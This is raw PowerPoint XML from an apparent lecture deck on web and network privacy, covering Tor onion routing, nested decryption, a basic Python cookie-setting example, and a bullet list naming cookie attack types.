        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to maintain the relation between the sending node and all other nodes, there is “private handshake” key maintained by the primary system that must be matched up at each node that the data is passed through. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The relay cell must ratify the handshake at each node to prepare for the Asymmetric cryptography.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385189952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8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="8229600" cy="4389120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cipher text  and the key is passed to the formulation of decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nested decryption procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="The message is encrypted multiple times at the source node prior to being sent along the routing path. Each hop will then decrypt the data one time (remove one layer of decryption) to find the necessary info for forwarding to the next hop. This procedure continues until the data arrives at the destination. " title="Nested Decyption"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068253" y="2652713"/>
            <a:ext cx="6372225" cy="3524250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29564455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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acknowledgements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Jie Liau – The Tor Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ashly Liza – Tor Onion Router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Rishikese MR – TOR Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Jack Maynard – Internet anonymity Using Tor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Mohammaed Bharmal – Tor: The Second Onion Router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Amrit Khandelwal – The Onion Routing (TOR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dogfunk – Tor Technology Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Abhimanyu Singh - The Deep Web, TOR Network and Internet Anonymity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Saprative Jana - Hacking Tor ( How does Tor work ?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ricardo Robles – Tor Pivoting Networks Share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Bharat Sabne – Tor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Utku Sen – Internat and Personal Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Tobias Clemson - Tor - Using alternative networks to protect your online privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155152430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4918377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Program to Access Cookie in Different Computer Languages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1690689"/>
            <a:ext cx="7886700" cy="4486274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many languages integrate libraries to access cookies, e.g., Java, Python, JavaScript, PHP, C#, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>― Setting Cookies with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>#!/usr/bin/env python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>import Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># create the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>c=Cookie.SimpleCookie()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># assign a value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>c['raspberrypi']='Hello world'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># set the xpires time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>c['raspberrypi']['expires']=1*1*3*60*60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># now we can send the page content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>        &lt;h1&gt;The cookie has been set&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935104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Web Cookie - Uses and Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Remember user to show relevant information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>	- Personalize website based on user’s preference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>- Tracking user’s web browsing habits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Eavesdropping </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS Cache Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Retrieve cookies by controlling DNS and fabricate fake entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross-site scripting: cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross-site scripting: proxy request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25484915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30488" y="3616325"/>
            <a:ext cx="4611687" cy="803275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>WEB AND NETWORK TRAFFIC PRIVACY</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630488" y="4900614"/>
            <a:ext cx="4878143" cy="419099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F5597"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JAVASCRIPT AND PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245749461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97F8FE40-9B38-4B19-A2E2-8B2CC637059C}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A842248C-A03C-465D-89D5-358CB784E511}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8E6A58D7-F77D-4998-978E-07C79A492866}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Flow</Template>
  <TotalTime>1244</TotalTime>
  <Words>2409</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>356</Paragraphs>
  <Slides>64</Slides>
  <Notes>17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64</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="72" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Flow</vt:lpstr>
      <vt:lpstr>Web and Network Privacy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction to Web Cookies</vt:lpstr>
      <vt:lpstr>Cookie File</vt:lpstr>
      <vt:lpstr>Web Cookie Types</vt:lpstr>
      <vt:lpstr>Web Cookie Types (Cont’d)</vt:lpstr>
      <vt:lpstr>Program to Access Cookie in Different Computer Languages</vt:lpstr>
      <vt:lpstr>Web Cookie - Uses and Attack</vt:lpstr>
      <vt:lpstr>  WEB AND NETWORK TRAFFIC PRIVACY</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript Program Samples</vt:lpstr>
      <vt:lpstr>Examples of Malicious Cookie Operation by JavaScript</vt:lpstr>
      <vt:lpstr>PHP</vt:lpstr>
      <vt:lpstr>PHP Program Samples</vt:lpstr>
      <vt:lpstr>  WEB AND NETWORK TRAFFIC PRIVACY</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Tracking through Cookie</vt:lpstr>
      <vt:lpstr>Lab Activity – Web Tracking</vt:lpstr>
      <vt:lpstr>REFERENCES</vt:lpstr>
      <vt:lpstr>  WEB AND NETWORK TRAFFIC PRIVACY</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>What is Tor?</vt:lpstr>
      <vt:lpstr>Onion Routing</vt:lpstr>
      <vt:lpstr>Onion Route Path</vt:lpstr>
      <vt:lpstr>Decryption in Onion Routing</vt:lpstr>
      <vt:lpstr>Onion Routing</vt:lpstr>
      <vt:lpstr>How does the Internet work?</vt:lpstr>
      <vt:lpstr>HTTP vs. HTTPs</vt:lpstr>
      <vt:lpstr>Routing in Normal Network</vt:lpstr>
      <vt:lpstr>Tor Onion Routing</vt:lpstr>
      <vt:lpstr>Message Encryption along Onion Routing</vt:lpstr>
      <vt:lpstr>Tor Router Design</vt:lpstr>
      <vt:lpstr>Tor Cell</vt:lpstr>
      <vt:lpstr>Tor Cell Header and Payload</vt:lpstr>
      <vt:lpstr>Control Commands </vt:lpstr>
      <vt:lpstr>Relay Commands</vt:lpstr>
      <vt:lpstr>Summary of Commands</vt:lpstr>
      <vt:lpstr>Example of TOR Design</vt:lpstr>
      <vt:lpstr>Relay Cells</vt:lpstr>
      <vt:lpstr>Opening and Closing Streams</vt:lpstr>
      <vt:lpstr>Integrity Checking on Streams </vt:lpstr>
      <vt:lpstr>Congestion Control in Tor</vt:lpstr>
      <vt:lpstr>Circuit Throttling and Stream Throttling</vt:lpstr>
      <vt:lpstr>Rate limiting and fairness</vt:lpstr>
      <vt:lpstr>How Tor works?</vt:lpstr>
      <vt:lpstr>Circuit Setup</vt:lpstr>
      <vt:lpstr>Onion Routing Example – Step (1)</vt:lpstr>
      <vt:lpstr>Onion Routing Example – Step (2)</vt:lpstr>
      <vt:lpstr>Onion Routing Example – Step (3)</vt:lpstr>
      <vt:lpstr>Another Onion Routing Example – Step (1)</vt:lpstr>
      <vt:lpstr>Another Onion Routing Example – Step (2)</vt:lpstr>
      <vt:lpstr>Another Onion Routing Example – Step (3)</vt:lpstr>
      <vt:lpstr>Encryption</vt:lpstr>
      <vt:lpstr>Diffie – Hellman Key exchange (DH)</vt:lpstr>
      <vt:lpstr>Cryptographic explanation of DH</vt:lpstr>
      <vt:lpstr>Asymmetric Cryptography</vt:lpstr>
      <vt:lpstr>Encryption and Decryption</vt:lpstr>
      <vt:lpstr>Symmetric Cryptography</vt:lpstr>
      <vt:lpstr>Additional Encryption</vt:lpstr>
      <vt:lpstr>Decryption</vt:lpstr>
      <vt:lpstr>Acknowledgements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Information-Theoretic Detection of SQL Injection Attacks</dc:title>
  <dc:creator>hshahria</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>494</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-01T15:50:22Z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